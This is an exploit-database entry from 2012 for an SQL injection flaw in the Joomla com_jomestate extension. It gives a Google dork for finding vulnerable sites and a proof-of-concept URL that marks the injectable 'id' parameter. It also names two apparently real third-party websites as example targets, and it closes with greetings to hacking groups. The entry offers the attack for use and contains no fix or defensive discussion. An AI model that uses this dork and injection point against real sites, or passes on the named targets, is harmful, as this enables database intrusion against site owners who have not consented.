id: 18048
date: 04/12/2012
title: Joomla com_jomestate SQLi vulnerability
author: R00T3R - 4L
cves: 

#################################################################
# Exploit Title: [ Joomla com_jomestate SQLi vulnerability ]
# Google Dork: [ inurl:com_jomestate ]
# Date: [ 10/April/2012 ]
# Author: [ R00T3R - 4L ]( Albanian Cyber Army )
# E-Mail: [ zipcode.-@live.com ]
# Software Link: [ http://extensions.joomla.org/extensions/vertical-markets/real-estate/10480 ]
# Tested on: [ Linux ]
#################################################################

[~] Exploit/p0c :
http://site.com/index.php?option=com_jomestate&task=print&id=[SQLi]

[~] Example Sites:
http://city-h.ru/index2.php?option=com_jomestate&task=print&id=1
http://www.investkontrakt.ru/index2.php?option=com_jomestate&task=print&id=1

GreeTz To: Kosova Hackers Security & Kosova Hackers Group & Transparent & RetnOHack & The Hackers Army & All Albanian Hackers.



#  0day.today [2023-03-24]  #